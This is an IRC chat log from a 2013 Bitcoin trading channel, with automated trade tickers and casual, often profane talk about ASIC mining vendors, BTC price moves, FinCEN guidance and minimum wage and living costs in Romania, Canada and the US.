bid: 63.50000, Best ask: 63.70002, Bid-ask spread: 0.20002, Last trade: 63.70002, 24 hour volume: 92771.15913148, 24 hour low: 57.70200, 24 hour high: 66.00000, 24 hour vwap: 61.99830 Mar 21 01:59:42 litecoin nosedive Mar 21 02:00:34 dunno if that counts as an 'asset' anymore. Mar 21 02:00:39 ;) Mar 21 02:01:48 I feel like eating steak Mar 21 02:01:49 mhm Mar 21 02:01:56 juicy rare steak. Mar 21 02:01:58 nomnomnom Mar 21 02:02:29 [BTCTC] [ASICMINER-PT] 1 @ 0.858989 BTC [+] Mar 21 02:05:14 whats with litecoin? Mar 21 02:05:46 its keeping its fiat value Mar 21 02:05:49 ok Bowjob is retarded Mar 21 02:05:50 but dropping against btc Mar 21 02:07:49 what Mar 21 02:09:41 the latest in mp arrogance : http://trilema.com/2013/strategic-superiority-the-saga-continues/ Mar 21 02:10:45 lol i'm gettin crunk with my floor guys Mar 21 02:11:17 first they wanted to smoke, then drink, now they wanna rap over some beats Mar 21 02:12:30 <[\\\]> https://bitcointalk.org/index.php?topic=66802.msg1643203#msg1643203 Mar 21 02:12:35 at first, I read that as "I am getting crunk with my floor, guys" Mar 21 02:12:59 in related news, asicminer should be worht 3btc now Mar 21 02:13:07 hm? Mar 21 02:13:15 avalon is a failure Mar 21 02:13:20 ah dat Mar 21 02:13:24 AM is the only dog in the race Mar 21 02:13:30 dub that's a point. Mar 21 02:13:32 well not rly Mar 21 02:14:01 avalon did just faceplant on a nail Mar 21 02:14:12 from the top rope Mar 21 02:14:15 whether that makes asicminer worth 3... Mar 21 02:14:48 ;;bc,nethash Mar 21 02:14:49 48124.866899322158 Mar 21 02:14:49 i havent been following, what did avalon do? Mar 21 02:14:53 url markdown's broken in that post Mar 21 02:15:08 avalon is gonna take a vacation Mar 21 02:15:20 i have a feeling they found a meter free elec plug and now making exuse not to sell by increasing the price xD Mar 21 02:15:26 topace_: admitted to not having shipped batch 1, not having capability to ship batch 2 and charging moonbeams for batch 3 Mar 21 02:15:51 dub: lol oh.. thats not good :p Mar 21 02:15:51 https://bitcointalk.org/index.php?topic=155345.msg1647013#msg1647013 ^ Mar 21 02:15:55 topace_ increased their unit price 5x Mar 21 02:16:23 but basically i think dub has it : they've decided not to ship but mine instead. Mar 21 02:16:39 which they had been allegedly dfoing a little anyway (people reporting dusted units delivered) Mar 21 02:16:39 s/dub/kako Mar 21 02:16:59 you know how scamming goes... today you dip a little Mar 21 02:17:08 tomorrow you figure since you're dipping anyway might as well keep it all. Mar 21 02:17:40 what's the worst that can happen ? they get a btctalk scammer tag and a chinese relic hunter is hired to track them down and "have a chat" ? Mar 21 02:18:03 dub so perhaps asicminer figures the same and your 3 isn't gonna be 3 for very long. Mar 21 02:18:15 and Bowjob has a peurto libre (sp?) level case of stockholm Mar 21 02:18:25 puerto Mar 21 02:18:47 haha sure buddy. whatever makes you feel better Mar 21 02:19:29 put zhou tong on the case Mar 21 02:19:30 spew moar miconisms troll Mar 21 02:19:59 forum needs a 'ignore people with anime avatars' widget Mar 21 02:20:19 guaranteed waste of electrons Mar 21 02:20:22 who are you? i dont even know who you are Mar 21 02:20:31 im flattered you care so much about it. thanks Mar 21 02:23:15 and bfl is "stuck on their test rig" Mar 21 02:23:19 for a week now? Mar 21 02:23:36 bfl decided to refund customers in btc, you know 2 per and mine themselfs too Mar 21 02:23:54 dub, you probably were offended by my bfl comments, someone's butthurt Mar 21 02:23:58 haha Mar 21 02:24:14 and i dont have stockholm, I've covered my BTC purchase with fiat, actually Mar 21 02:24:25 lolwat Mar 21 02:24:42 im actually feeling a lot better about my bfl preorder now :) Mar 21 02:25:05 haha i knew it. you were butthurt Mar 21 02:25:12 keep it sore buddy Mar 21 02:25:40 oh miners Mar 21 02:25:46 so emotionally attached to their mining rigs Mar 21 02:25:54 <[\\\]> without miners, bitcoin would have no future Mar 21 02:26:02 mine with a gpu Mar 21 02:26:03 if I was butthurt t'would not be due to you repasting the rampant threadshitting of the other clowns Mar 21 02:26:13 <[\\\]> mining with a gpu IS a miner Mar 21 02:26:14 silicon ain't trivial Mar 21 02:26:14 <[\\\]> derp Mar 21 02:26:25 slashes, let me finish before you jump down my throat Mar 21 02:26:28 you see what mister-stabintheface-bigg did https://bitcointalk.org/index.php?topic=155612.msg1650141#msg1650141 Mar 21 02:26:34 <[\\\]> benkay, then use punctuation. Mar 21 02:27:11 asics are arguably bad for the ecosystem, Mar 21 02:27:22 <[\\\]> notice how the forum hasn't gotten any donations since January? Mar 21 02:27:29 they cost a lot of money, and deliver a lot of hashing power to the purchasing entities. Mar 21 02:27:31 <[\\\]> benkay: you realize people said the same about gpu? Mar 21 02:28:27 it's also hellza tricky to manufacture your own chips. not that i know from experience, never having sunk shitloads of money into a litho run and subsequent processing (knowing how much things cost in the first place). Mar 21 02:29:24 this absurd focus on overpowered mining rigs is evident of an unhealthy focus on short term gains over long term tools to expand the bitcoin economy. Mar 21 02:29:36 wait, drama ? Mar 21 02:29:48 <[\\\]> nah Mar 21 02:29:58 <[\\\]> another rocket scientist here to school the rest of us Mar 21 02:30:03 <[\\\]> save us from ourselves. Mar 21 02:30:11 [\\\] why'd the forum fget donations tho ? so theymos can come up with weird financial schemes ? Mar 21 02:30:15 oh, and nice use of stockholm by the way, irrc I was the first one who used it against BFL. I'm honored Mar 21 02:30:17 <[\\\]> yep Mar 21 02:30:33 <[\\\]> now we're gonna gonna split it up because one person can't hold it Mar 21 02:30:39 <[\\\]> and 2 of 3 is too complicated Mar 21 02:31:04 i like dt https://bitcointalk.org/index.php?topic=155612.msg1650151#msg1650151 Mar 21 02:31:06 why isn't he here! Mar 21 02:31:39 [\\\] i suppose you've seen the http://bitbet.us/bet/314/bitcointalk-org-treasurer-to-be-scammer-tagged/ Mar 21 02:31:45 a cool 200 bux riding on that atm Mar 21 02:31:46 <[\\\]> yes Mar 21 02:31:53 even money too Mar 21 02:32:02 <[\\\]> mircea_popescu: at this point, its more than 200 bux Mar 21 02:32:07 <[\\\]> oh look, now its even more Mar 21 02:32:09 ya i guess that's right Mar 21 02:32:09 <[\\\]> :-x Mar 21 02:32:10 lol Mar 21 02:32:54 benkay no, actually, asics are a crucial step in securing the network. Mar 21 02:32:59 w/o them we're playdough. Mar 21 02:33:20 i'll give on that Mar 21 02:33:40 still hold that the furor over their delivery to market is idiots. Mar 21 02:33:40 and in a sense it's good that a bunch of no starter corps did it first Mar 21 02:33:48 this way when somebody makes a real run, it's dented somewhat Mar 21 02:33:57 sheeeit Mar 21 02:34:03 i live in the forest Mar 21 02:34:08 there are plenty of fabs here Mar 21 02:34:43 gotta find some forward thinking intel folks Mar 21 02:34:46 [MPEX] [S.MPOE] 2151 @ 0.00075675 = 1.6278 BTC [-] Mar 21 02:34:51 granted, most are cubeslaves Mar 21 02:35:37 as a core developer, i look upon all Avalons as my son. i will send them to who believe us, not the faithless or buzzard. Mar 21 02:35:42 lewl Mar 21 02:35:54 i think amd could actually do it Mar 21 02:36:06 if someone could talk them into sinking the moneyz into it. Mar 21 02:36:27 if bitcoin weren't so retarded we'd have all ny escorts by now Mar 21 02:36:44 and then i could find a foxy chick to train for this mission of infiltrating amd top brass Mar 21 02:37:08 a southern california stanford student would suffice Mar 21 02:37:42 probably not as smart as a new york whore Mar 21 02:37:53 but more likely to raise the funds for an asic round Mar 21 02:38:09 plus local talent Mar 21 02:38:25 local isn't so great. Mar 21 02:38:44 [MPEX] [S.MPOE] 5000 @ 0.00074461 = 3.7231 BTC [-] Mar 21 02:38:53 [HAVELOCK] [HIM] 3 @ 1.98 = 5.94 BTC [-] Mar 21 02:38:55 [HAVELOCK] [HIM] 1 @ 1.99 BTC [+] Mar 21 02:38:56 [MPEX] [S.MPOE] 3348 @ 0.0007446 = 2.4929 BTC [-] Mar 21 02:38:56 [MPEX] [S.MPOE] 2552 @ 0.00074261 = 1.8951 BTC [-] Mar 21 02:39:00 get rory & bruce in a fingertrap, 2014 sees 1mn asics delivered Mar 21 02:39:11 rory and bruce? Mar 21 02:39:17 rory & bruce! Mar 21 02:39:38 anyone notice the daily transactions have fallen from 75k to 45k Mar 21 02:39:40 local talent is better than no talent, and silicon valley has plenty of chip facilities and fabless foundries. Mar 21 02:39:54 https://blockchain.info/charts/n-transactions Mar 21 02:40:10 satoshi dice die off? Mar 21 02:40:43 constant value of transactions with decreased value of fiat currencies? Mar 21 02:41:19 tiberiusiv seems to me within normal noise Mar 21 02:41:26 [MPEX] [O.BTCUSD.P570T] 1 @ 0.07415034 BTC [-] Mar 21 02:41:39 herro Mar 21 02:41:43 what's new Mar 21 02:41:59 does the confirmation time decrease with more hasing power? Mar 21 02:42:17 not necessarily Mar 21 02:42:18 no Mar 21 02:42:24 https://blockchain.info/charts/avg-confirmation-time Mar 21 02:42:26 new lows? Mar 21 02:43:10 mircea_popescu: if I create and sell put options, and I want to buy them back before they exercise, how do I do that? Mar 21 02:43:10 it will retarget to 10 min every 2014 blocks or smth which is ~2weeks Mar 21 02:43:18 ;;bc,stats Mar 21 02:43:20 pizzaman1337 by buying them back. Mar 21 02:43:20 Current Blocks: 227033 | Current Difficulty: 4847647.152065606 | Next Difficulty At Block: 227807 | Next Difficulty In: 774 blocks | Next Difficulty In About: 3 days, 16 hours, 2 minutes, and 16 seconds | Next Difficulty Estimate: 6269965.33146 | Estimated Percent Change: 29.34038 Mar 21 02:43:30 let me rephase, assuming all miners are "good" yes the linear thought is that confirmations should increase Mar 21 02:43:46 especially with pools ops increasing block size restrictions in their mined blocks Mar 21 02:43:47 mircea_popescu: when I do that, should they be removed from the "To which add sums deposited as surety for 4th Friday settled option and future contracts" section? Mar 21 02:43:54 tiberiusiv confirmation time is a function of the ratio between implied hash and actual hash. Mar 21 02:44:01 introduce nefarious hashpower and that doesn't hold true Mar 21 02:44:10 if diff retarget works on 20th and then miners do 30th, Mar 21 02:44:15 you'll get 50% faster confirms. Mar 21 02:44:23 pizzaman1337 nope Mar 21 02:44:42 why not? Mar 21 02:44:48 are those in here with substantial bitcoin holdings hedging ? Mar 21 02:44:48 why would it ? Mar 21 02:45:06 or just outright long Mar 21 02:45:10 tiberiusiv i sold ~1k btc, but not really doing much other than that. Mar 21 02:45:26 ok, yeah, I guess it doesn't Mar 21 02:45:41 doesn't need to Mar 21 02:45:45 hoooooold Mar 21 02:45:57 throw some more o's in there Mar 21 02:45:59 i mean, when options expire, you get collateral - put value back from collateral + put value back from holdings Mar 21 02:46:08 so it's nulled out, you jsut get your collateral back Mar 21 02:46:18 yeah, that makes sense. Helps keep track too. Mar 21 02:46:25 ya Mar 21 02:46:30 also makes things easier for the larger player Mar 21 02:46:41 this latest move has been too far too fast Mar 21 02:46:41 he creates put once buys/sells it 500 times or w.e Mar 21 02:46:49 Ok, I guess in two days I'll feel comfortable with this Mar 21 02:46:58 or lose all of your money :D Mar 21 02:47:26 I'll learn something at least Mar 21 02:47:58 that's the important thing. Mar 21 02:48:06 earn or learn Mar 21 02:48:09 too many focus on the former. Mar 21 02:48:30 https://bitcointalk.org/index.php?topic=40264.msg1647627#msg1647627 poor piuk Mar 21 02:48:44 benkay: that's why I'm only messing around with <10 options this month... Mar 21 02:48:53 mircea_popescu: devops is hard yo Mar 21 02:48:54 [MPEX] [S.MPOE] 10764 @ 0.00074261 = 7.9935 BTC [-] Mar 21 02:48:56 [MPEX] [S.MPOE] 1686 @ 0.00073845 = 1.245 BTC [-] Mar 21 02:49:11 tell me about it. Mar 21 02:49:37 go to bed, btc is 64, wake up btc is 64... btc is same! not happened in forever... Mar 21 02:49:53 he's in the shitspot of all time. unlike mpex he doesn't make infinite moneyz so he can't spend infinite moneyz, unlike mpoe he can't just go "heh, trade on irc fu". Mar 21 02:50:07 he may still solve the problem by proxiing as he's trying, but it'll be more work needed Mar 21 02:50:27 Chaang-Noi you went to bed wrongly. i went to bed it was 60 woke up 64 Mar 21 02:50:41 we did get a new atg to 66 i see Mar 21 02:50:51 ath Mar 21 02:51:01 crazy btc... Mar 21 02:51:07 come on 1000 Mar 21 02:51:41 1000 is highly improbable Mar 21 02:51:50 disagree. 1000 is inevitable. Mar 21 02:51:53 <[\\\]> thats what they said about gold Mar 21 02:51:57 inevitable, yes, but not short term. Mar 21 02:52:04 not in vars :) Mar 21 02:52:13 im willing to wait 2 to 5 years for 1000 Mar 21 02:52:16 what is short term in bitcoin time? Mar 21 02:52:16 <[\\\]> not inevitable Mar 21 02:52:18 tiberiusiv suppose the us fucks up. such as, california actually defaults. Mar 21 02:52:31 california has very little debt Mar 21 02:52:36 <[\\\]> illinois will default before california Mar 21 02:52:45 i've not been watching too closely. Mar 21 02:52:47 whaddabout detroit? Mar 21 02:52:47 texas defaults. Mar 21 02:52:48 its like 150 billion Mar 21 02:52:56 <[\\\]> detroit already defaulted, no? Mar 21 02:52:59 defaults are dollar positive Mar 21 02:53:02 twice iirc Mar 21 02:53:09 tiberiusiv how do you figure ? Mar 21 02:53:17 i heard bitcoin outperforms gold Mar 21 02:53:18 last i heard the state wanted to 'take over' detroit Mar 21 02:53:25 <[\\\]> they already did Mar 21 02:53:25 it did Mar 21 02:53:31 for like the first time in millenia Mar 21 02:53:41 during a default fractional reserve lending works backwards and fiat dollars are destroyed, making the existing ones worth more Mar 21 02:53:53 the surviving ones that is Mar 21 02:53:56 thats what happend in late 08 Mar 21 02:54:00 tiberiusiv yes but we're not discussing that Mar 21 02:54:02 paradigm shift Mar 21 02:54:08 shiney metal less valuable Mar 21 02:54:11 newsflash Mar 21 02:54:11 we're discussing perception. the 50-65 runup was pretty much all cyprus media circus Mar 21 02:54:40 and FinCEN, right? Mar 21 02:54:47 maybe Mar 21 02:54:53 yeah, but frankly i don't think anyone from outside much cared Mar 21 02:54:54 1000 bitcoin would mean the daily trade volume would have to be at least 100mil Mar 21 02:54:58 fincen is important for insiders mostly. Mar 21 02:55:13 I think 50-65 was FinCEN saying it's not illegal to accept btc Mar 21 02:55:18 there would have to be huge liquidity Mar 21 02:55:20 <[\\\]> most people don't even really understand what fincen means Mar 21 02:55:24 I think the topic being mentioned at that level means something at least. Mar 21 02:55:37 bitcoin foundation blog say ignore it kinda Mar 21 02:55:41 iana Mar 21 02:55:44 [\\\] has it. fincen is important for people in the know. deeply in the know Mar 21 02:56:01 <[\\\]> hell, half the people in the know don't know Mar 21 02:56:09 ^ Mar 21 02:56:13 well that's because there's two knows. Mar 21 02:56:20 <[\\\]> the report released right now is only guidance Mar 21 02:56:24 <[\\\]> nothing's technically changed Mar 21 02:56:29 <[\\\]> but something could change Mar 21 02:56:30 fincen recieves so many suspiscious transactions a day its impossible to analyze them all Mar 21 02:56:35 america is one big ? Mar 21 02:56:42 then there is the rest of the world Mar 21 02:56:43 <[\\\]> jcpham: fuckyup? Mar 21 02:56:43 jcpham oneplus. Mar 21 02:56:51 kind of like the stazi in east germany, they collected so much data on people it just overwhelmed them and they couldnt do anything Mar 21 02:57:06 tiberiusiv they didn't collect it lol. peopel just kept calling it in. Mar 21 02:57:25 lol Mar 21 02:57:47 government bodies tend to be highly ineffective Mar 21 02:58:15 means to an end Mar 21 02:58:24 effectiveness is in the ends Mar 21 02:58:44 they've grown ineffetive Mar 21 02:59:15 FinCEN to me means soon large investers, lije hedge funds will pour money in, might be happening now Mar 21 02:59:18 <[\\\]> https://bitcointalk.org/index.php?topic=155345.msg1650310#msg1650310 Mar 21 02:59:28 <[\\\]> Chaang-Noi: shouldn't you be off with your rice? Mar 21 02:59:47 bitcoin has been perfect for hedging since day one Mar 21 03:00:00 regarding cyprus, how in the WORLD does a topic like that just get bandied about in politics? Mar 21 03:00:04 but hard to pour in millions and millions Mar 21 03:00:05 volatility,laws, and time are the problems Mar 21 03:00:07 chaang-noi: if that was true we would see tighter bid/asks Mar 21 03:00:30 doesnt take much to knock the price back to 50 Mar 21 03:00:33 right now they are all buyers, they have noting to sell yet Mar 21 03:00:35 [\\\] haters gon hate Mar 21 03:00:47 <[\\\]> jcpham: I actually thought he made a good point Mar 21 03:01:19 i thought the depositers got a great deal in cyrpys Mar 21 03:01:21 cyprus* Mar 21 03:01:33 i'm still reading Mar 21 03:01:36 last comment Mar 21 03:02:10 [\\\] of course he has a point. old elite gettingstomped is always a good time to nostalgia. Mar 21 03:02:46 <[\\\]> all the fail in the community isn't a good thing. Mar 21 03:03:54 [MPEX] [S.MPOE] 2364 @ 0.00073845 = 1.7457 BTC [-] Mar 21 03:03:57 wait... who is the community again Mar 21 03:04:00 [MPEX] [S.MPOE] 4286 @ 0.00073772 = 3.1619 BTC [-] Mar 21 03:04:03 come on midnightmagic, here it is : https://bitcointalk.org/index.php?topic=155345.msg1649131#msg1649131 Mar 21 03:04:07 i thought everyone had their own walled gardens by now Mar 21 03:04:10 i have this delicious crow stu, you hungry yet ? Mar 21 03:04:22 <[\\\]> jcpham: I forgot this was compuserve Mar 21 03:04:41 should've built your castle by now Mar 21 03:04:48 complete with moat Mar 21 03:05:15 mircea: why did you choose to return to romania vs other EU destinations? Mar 21 03:05:30 in the age of kings who is your ally? Mar 21 03:05:50 <[\\\]> my moat runneth deap Mar 21 03:05:59 tiberiusiv timisoara particularly is conveniently placed. Mar 21 03:06:17 let me dig the article up for you Mar 21 03:06:49 http://trilema.com/2012/sa-i-raspundem-dara-tinarului/#comment-86305 Mar 21 03:06:59 <[\\\]> .bait Mar 21 03:06:59 if gt fucks it up too badly i'll clarify. Mar 21 03:07:07 <[\\\]> what happened to that bot? :( Mar 21 03:07:19 dude that blog is in funny symbols Mar 21 03:07:34 what does it mean brah Mar 21 03:08:39 it's a mystery Mar 21 03:09:00 mircea: personal freedoms in RO vs US? Mar 21 03:09:35 there's personal freedoms in the us ? Mar 21 03:09:42 what is th 2006-2007 cacriza Mar 21 03:09:48 wtf are you talking about Mar 21 03:09:50 that crisis Mar 21 03:10:00 is this vortex mathmatics Mar 21 03:10:07 i heard about that on a TEd talk once Mar 21 03:10:09 jcpham secret hashing recipe Mar 21 03:11:04 i think you made a good choice vs new zealand Mar 21 03:11:37 http://youtu.be/7pvuTZ5u6Kg Mar 21 03:12:11 tiberiusiv let me give you a very good example that just happened recently. Mar 21 03:12:11 http://trilema.com/2013/why-love-romania-a-guide-for-the-us-citizen/ Mar 21 03:12:58 photons don't have mass mircea_popescu Mar 21 03:13:12 depends what definition of mass you use Mar 21 03:13:23 you should really watch that youtube Mar 21 03:13:33 learn something new for the oix metrics Mar 21 03:15:12 lol Mar 21 03:15:25 each oix weighs approximately the same as a sheep. Mar 21 03:19:27 [BTCTC] [ASICMINER-PT] 3 @ 0.91 = 2.73 BTC [+] Mar 21 03:20:16 [BTCTC] [ASICMINER-PT] 1 @ 0.92 BTC [+] Mar 21 03:20:18 [BTCTC] [ASICMINER-PT] 1 @ 0.92 BTC [+] Mar 21 03:20:21 [BTCTC] [ASICMINER-PT] 4 @ 0.92 = 3.68 BTC [+] Mar 21 03:20:32 low 90s nice Mar 21 03:20:47 mircea: how is the cost of living there? Mar 21 03:20:50 if add in the dividends that is like 1 btc a share Mar 21 03:21:20 [BTCTC] [ASICMINER-PT] 1 @ 0.928 BTC [+] Mar 21 03:22:14 [BTCTC] [ASICMINER-PT] 1 @ 0.921 BTC [-] Mar 21 03:22:23 [BTCTC] [ASICMINER-PT] 1 @ 0.921 BTC [-] Mar 21 03:22:57 [BTCTC] [ASICMINER-PT] 1 @ 0.9289 BTC [+] Mar 21 03:23:41 [BTCTC] [ASICMINER-PT] 3 @ 0.929 = 2.787 BTC [+] Mar 21 03:24:13 [BTCTC] [ASICMINER-PT] 3 @ 0.929 = 2.787 BTC [+] Mar 21 03:24:51 [BTCTC] [ASICMINER-PT] 1 @ 0.929 BTC [+] Mar 21 03:24:53 tiberiusiv minimum wage ~500 lei / month. comes to 150 bux Mar 21 03:25:30 how do people eat? Mar 21 03:25:52 [HAVELOCK] [SDICE] 1 @ 0.47249999 BTC [-] Mar 21 03:25:53 Cheaper prices... Mar 21 03:26:36 namworld: they are in the EU so any cheaper goods would get exported out Mar 21 03:26:45 average wage here is $200 a month Mar 21 03:26:48 out of tubes in the case of fish Mar 21 03:26:52 [BTCTC] [CRYPTO-TRADE] 3 @ 0.195 = 0.585 BTC [-] Mar 21 03:27:06 chaang: thailand? Mar 21 03:27:10 150 a month in europe seems low Mar 21 03:27:13 yeah thailand Mar 21 03:27:31 tiberiusiv about like italians, maybe a little better. Mar 21 03:27:49 certainly has the world's best champagne, for instance. Mar 21 03:28:10 price for pack of marlboro reds? Mar 21 03:28:15 lots of agricultural tradition, probably the oldest continuously farmed land in europe outside of italy proper. Mar 21 03:28:29 like 3-4 dollars in the supermarkets. Mar 21 03:30:53 i find it hard to believe you can survive on 150 a month Mar 21 03:31:22 you can't. Mar 21 03:31:26 that's the entire fucking point. Mar 21 03:31:39 money has no value if everyone can survive on minimal wage. that's socialism. Mar 21 03:31:49 you want to survive, you'd better start doing something useful. Mar 21 03:32:11 guess youve got a point Mar 21 03:32:19 whats the average salary then? Mar 21 03:32:29 People here can survive on minimum wage =/ Mar 21 03:32:35 Same for US I guess. Mar 21 03:32:54 in US its somewhat possible Mar 21 03:33:03 but youd be living in near 3rd world level Mar 21 03:33:03 tiberiusiv about 500 bux Mar 21 03:33:15 easily possible once you starting cracking out the kids Mar 21 03:33:17 Namworld that's precisely why canada/us suck. Mar 21 03:33:20 jesus Mar 21 03:33:32 pack of smoeks is ~$20 here Mar 21 03:33:42 smokes* Mar 21 03:33:42 13 in canada when i was there Mar 21 03:33:50 and min wage was like $11 Mar 21 03:33:55 you can just plant your own tobacco, costs you about 1 cent per leaf or something Mar 21 03:34:17 i lived on min wage once Mar 21 03:34:18 canadian mcdonalds were pretty automated from the high minimum wage Mar 21 03:34:26 it's not very good of course, but it's way better than any industrial crap. Mar 21 03:34:33 i worked at a taco bell, saved up some money, bought some land Mar 21 03:34:35 i dunno who still smokes ciggarettes with all the stuff they add Mar 21 03:34:59 namworld: you cant survive on min wage in the US Mar 21 03:35:03 there are cigs available w/o the additives Mar 21 03:35:07 Ah. Mar 21 03:35:28 Seems odd... I thought most were on or near minimum wage in most countries. Mar 21 03:35:38 no Mar 21 03:35:50 average US wage is about 22-24 per hour Mar 21 03:36:36 min wage in 'merica is sufficient for survival if you arn't a fucking dumbass Mar 21 03:36:57 what state? maybe in mississipi Mar 21 03:37:02 missouri Mar 21 03:37:07 If you don't: Drink, smoke Mar 21 03:37:11 i did tho Mar 21 03:37:12 and share an appartment Mar 21 03:37:16 i didn't Mar 21 03:37:23 minimum wage is way more than needed... Mar 21 03:37:25 dumpster dive Mar 21 03:37:39 what planet are you living on namworld? Mar 21 03:37:47 Canada Mar 21 03:37:56 I had a 1 room apt until i had enought to buy a plot of land and a cheep ass trailor Mar 21 03:38:10 in canada you have to work 1 week @ minimum wage just to pay for car insurance Mar 21 03:38:16 in soviet canukistan wage minimums you Mar 21 03:38:28 a pack of chips is like $4 Mar 21 03:38:29 1 room appartment is too costly. Take a large one with co-tenants Mar 21 03:38:43 1 room apt was 250/month Mar 21 03:38:48 500sq ft apartments in toronto rent for like 1500 Mar 21 03:39:00 thats a big appt Mar 21 03:39:04 Well don't go live in fucking toronto downtown. Mar 21 03:39:06 oh wait, foot Mar 21 03:39:16 silly imperials Mar 21 03:39:20 namworld: anywhere else you need a car which is impossible to afford on min wage Mar 21 03:39:28 i was just in ontario for a few months Mar 21 03:39:36 i had to have a car Mar 21 03:39:41 i bought one for 300 usd Mar 21 03:39:47 kept good care of it Mar 21 03:39:52 upgraded to a scooter Mar 21 03:39:53 its impossible to live in canada without a car Mar 21 03:40:06 later a van Mar 21 03:40:07 people were paying 200-400 a month in insurance from 1-2 speeding tickets lol Mar 21 03:40:44 20 per hour is poverty in canada imo Mar 21 03:40:45 the scooter was awesome b/c it had a small enough engine that the state considered it a bicycle Mar 21 03:40:48 no insurance Mar 21 03:41:24 http://trilema.com/2013/in-which-we-aspersor/ Mar 21 03:41:25 i was shocked how canadians live too Mar 21 03:41:26 for the lulz. Mar 21 03:41:36 You can rent for 500 USD/month and have a 80$ monthly pass for public transit. Minimum wage is 10$ per hour so 400 per week or over 1600 per month. Cut 25% in taxes. Mar 21 03:41:38 up at 6am to sit in traffic for 2 hours Mar 21 03:41:43 i worke with plenty of people who couldn't manage their money, in their case 7.5/hr was not enough Mar 21 03:41:52 1200 per month... you can live on that no problem in canada. Mar 21 03:41:58 plus, they often refused to work more than 20hrs a week Mar 21 03:42:19 namworld: you realize thats 50% below government povery line? Mar 21 03:42:37 smickles> upgraded to a scooter ahahaha Mar 21 03:42:39 canadian government classifies under 24k a year income as poverty Mar 21 03:42:44 What poverty line? You lack nothing on minimum wages. Mar 21 03:42:52 I pay $1400/m in rent Mar 21 03:42:54 minimun wage pays effective federal tax Mar 21 03:42:56 mircea_popescu: it was a better vehicle than the 82 mazda b2000 Mar 21 03:42:56 the high min wage means prices are sky high Mar 21 03:43:02 no Mar 21 03:43:02 dub i pay like triple that in servers. Mar 21 03:43:06 That may be. But it's feasible if you don't waste money. Mar 21 03:43:10 you cant legislate prosperity Mar 21 03:43:18 namworld: eating is wasting money? Mar 21 03:43:19 the only thing you can legislate is laziness. Mar 21 03:43:23 minimum wage is 8 or so Mar 21 03:43:26 mircea_popescu: thats business expense not personal Mar 21 03:43:30 It's freakin not waste! Mar 21 03:43:34 minimum wage in ontario was 10.50+ last time i was there Mar 21 03:43:36 dub i get personal about busienss Mar 21 03:43:37 [MPEX] [S.MPOE] 4864 @ 0.00073772 = 3.5883 BTC [-] Mar 21 03:43:39 [MPEX] [S.MPOE] 7782 @ 0.00073752 = 5.7394 BTC [-] Mar 21 03:43:40 a mcdonalds meal came to $10 Mar 21 03:43:49 [MPEX] [S.MPOE] 8258 @ 0.00073383 = 6.06 BTC [-] Mar 21 03:43:54 realistic lowest wage paid to a adult is about 11 Mar 21 03:43:56 10.5 cad, wow Mar 21 03:44:05 pack of smokes $12, chips $4 Mar 21 03:44:07 mircea_popescu: I pay a lot more than that in mortgage repayments too Mar 21 03:44:10 WTF MAN! You don't need a freakin 1500/month appartment or eat 10$ meals at McD to survive! Mar 21 03:44:17 car insurance 200-400 on a honda civic per month Mar 21 03:44:24 Chips are not 4$ and smokes... well really, smoking does cost a lot. Mar 21 03:44:29 namworld: mcdonalds is cheaper then groceries Mar 21 03:44:45 NO, for fuck's sake, NO! Mar 21 03:44:50 namworld: are you aware an average home costs 650,000 in ontario? Mar 21 03:44:56 yeah, a good part of how i did well on 7.5/hr was that i cooked my own meals, had a veggie garden Mar 21 03:44:59 No car on minimum wage, but public transit, what's wrong with that? Mar 21 03:45:01 in australia shit is crazy high cuz of the boom, i was told about 12$ bananas Mar 21 03:45:04 lived outside the city Mar 21 03:45:14 canadians survive on credit cards and home loans Mar 21 03:45:22 Well don't buy a 650k house in Ontario man... Mar 21 03:45:23 ive never seen such a population loaded on credit Mar 21 03:45:36 in AU a guy drives a truck on a mine and makes $150k a year... Mar 21 03:45:40 serfs Mar 21 03:45:43 alot of the us is too big for public transportation Mar 21 03:45:43 tiberiusiv the us isnt much better. Mar 21 03:46:10 public transportation sucks unless its those 300km/h trains Mar 21 03:46:16 he who can manage his money is god among men Mar 21 03:46:21 apparently Mar 21 03:46:25 smickles among women. Mar 21 03:46:45 bitches like money Mar 21 03:46:46 discount the eunics Mar 21 03:46:53 spelling -_- Mar 21 03:47:02 namworld: in canada to live well, ie go on vacation once a year and have stuff you need to earn 15k a month pretax Mar 21 03:47:33 or else you just grinding paycheck to paycheck Mar 21 03:47:39 meanwhile 15k a year in romania gets you two households with their women and children Mar 21 03:47:45 15k a month? are you crazy? Mar 21 03:47:59 if you think eating mcdonals 3 meals a day is living well.. Mar 21 03:48:02 namworld: i lived there for 2 years Mar 21 03:48:12 tiberiusiv: i don't know you, but you might benefit by traveling a little Mar 21 03:48:16 dub: poor people eat mcdonalds in canada Mar 21 03:48:27 why? Mar 21 03:48:28 for $10 you get enough calories for the day Mar 21 03:48:29 the internet still the great social class mixer i see, bringing together those who otherwise would never meet. Mar 21 03:48:38 why not eat boiled potatoes or smt Mar 21 03:48:53 smickles scurvy Mar 21 03:48:55 tiberius: I can do the same on 2.5 per day if I wanted on regular groceries... Mar 21 03:49:08 man how many times are you going to repeat that Mar 21 03:49:09 mircea_popescu: an orange can't be that hard to come by Mar 21 03:49:14 I like a little bit of luxury in my diet tho. Mar 21 03:49:28 toronto for example is more expensive then NYC Mar 21 03:49:29 yes. octopussy salad! Mar 21 03:49:33 yall niggas nee aquaponics Mar 21 03:49:33 with half the income Mar 21 03:49:48 grow food and FISH Mar 21 03:50:34 dub: fishing is awesome, even when since i had enough money to not have to do it, i still like pulling a fish out of the river for dinner Mar 21 03:50:43 There's tons of people living on less than 2k per month that don't lack anything. They have plenty of food, decent appartment, everything they need. You don't need 15k per month to survive. If you can't live without that kind of money... well really, I don't know what to say. Mar 21 03:50:58 smickles: I go fishing maybe once a wekk avg over summer Mar 21 03:51:03 http://www.numbeo.com/cost-of-living/compare_cities.jsp?country1=Canada&city1=Toronto&country2=Romania&city2=Timisoara Mar 21 03:51:27 smickles: got a kayak setup with sonar etc Mar 21 03:51:40 You would need around 6,552.20lei (1,967.29C$) in Timisoara to maintain Mar 21 03:51:40 the same standard of life that you can have with 4,900.00C$ in Toronto Mar 21 03:51:50 dub: lol, i just need to look at the water/land to know where the fish are Mar 21 03:52:09 well the fact that you said river.. Mar 21 03:52:24 you can;'t realy compare romanian local cheese to canadian tho Mar 21 03:52:25 i usually walk the bank Mar 21 03:52:32 I prefer salt water fish Mar 21 03:52:34 romanian cheese is like the expensive imported french gourmet stuff Mar 21 03:52:49 I thought the point was about having enough to live by without living from check to check Mar 21 03:53:07 surviving on min wage in ontario is impossible Mar 21 03:53:21 youd have to get 